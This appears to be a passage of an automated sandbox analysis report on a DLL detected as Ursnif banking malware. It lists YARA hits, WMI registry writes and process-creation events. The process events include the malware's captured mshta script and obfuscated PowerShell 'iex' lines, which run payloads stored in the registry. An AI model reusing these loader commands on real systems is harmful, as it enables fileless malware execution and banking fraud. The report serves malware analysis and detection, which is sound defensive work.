            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            System Summary:

            barindex
            PE file has a writeable .text sectionShow sources
            Source: 6.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: 6.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1B0844_2_00F1B084
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F133734_2_00F13373
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1294D4_2_00F1294D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F16C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_00F16C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F165B4 NtMapViewOfSection,4_2_00F165B4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F17562 GetProcAddress,NtCreateSection,memset,4_2_00F17562
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1B2A9 NtQueryVirtualMemory,4_2_00F1B2A9
            Source: 6.dllBinary or memory string: OriginalFilenameSymErr.exeT vs 6.dll
            Source: 6.dllBinary or memory string: OriginalFilenameNsc.exe. vs 6.dll
            Source: 6.dllBinary or memory string: OriginalFilenamebyInstallHelper.exe. vs 6.dll
            Source: 6.dllBinary or memory string: OriginalFilenameBgRegister.exe4 vs 6.dll
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: 6.dllStatic PE information: invalid certificate
            Source: 6.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\6.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
